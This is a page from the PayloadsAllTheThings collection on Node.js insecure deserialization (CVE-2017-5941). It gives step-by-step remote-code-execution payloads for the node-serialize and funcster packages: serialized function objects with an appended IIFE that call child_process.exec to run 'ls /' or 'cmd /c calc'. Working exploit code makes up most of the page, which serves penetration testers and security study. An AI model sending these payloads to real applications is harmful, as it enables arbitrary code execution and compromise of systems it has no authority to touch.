PayloadsAllTheThings/Insecure Deserialization/Node.md

52 lines
1.8 KiB
Markdown
Raw Normal View History

2022-10-12 10:13:55 +00:00
# Node Deserialization
2022-09-23 09:21:29 +00:00
## Summary
* [Exploit](#exploit)
2022-11-03 20:31:50 +00:00
* [node-serialize](#node-serialize)
* [funcster](#funcster)
2022-09-23 09:21:29 +00:00
* [References](#references)
2022-09-23 09:21:29 +00:00
## Exploit
2022-11-03 20:31:50 +00:00
* In Node source code, look for:
* `node-serialize`
* `serialize-to-js`
* `funcster`
2022-11-03 20:31:50 +00:00
### node-serialize
2022-09-23 09:21:29 +00:00
> An issue was discovered in the node-serialize package 0.0.4 for Node.js. Untrusted data passed into the `unserialize()` function can be exploited to achieve arbitrary code execution by passing a JavaScript Object with an Immediately Invoked Function Expression (IIFE).
1. Generate a serialized payload
```js
var y = {
rce : function(){
require('child_process').exec('ls /', function(error,
stdout, stderr) { console.log(stdout) });
},
}
var serialize = require('node-serialize');
console.log("Serialized: \n" + serialize.serialize(y));
```
2. Add bracket `()` to force the execution
```js
{"rce":"_$$ND_FUNC$$_function(){require('child_process').exec('ls /', function(error,stdout, stderr) { console.log(stdout) });}()"}
```
3. Send the payload
2022-11-03 20:31:50 +00:00
### funcster
```js
{"rce":{"__js_function":"function(){CMD=\"cmd /c calc\";const process = this.constructor.constructor('return this.process')();process.mainModule.require('child_process').exec(CMD,function(error,stdout,stderr){console.log(stdout)});}()"}}
```
2022-09-23 09:21:29 +00:00
## References
- [CVE-2017-5941 - NATIONAL VULNERABILITY DATABASE - February 9, 2017](https://nvd.nist.gov/vuln/detail/CVE-2017-5941)
- [Exploiting Node.js deserialization bug for Remote Code Execution (CVE-2017-5941) - Ajin Abraham - October 31, 2018](https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)
- [NodeJS Deserialization - gonczor - January 8, 2020](https://blacksheephacks.pl/nodejs-deserialization/)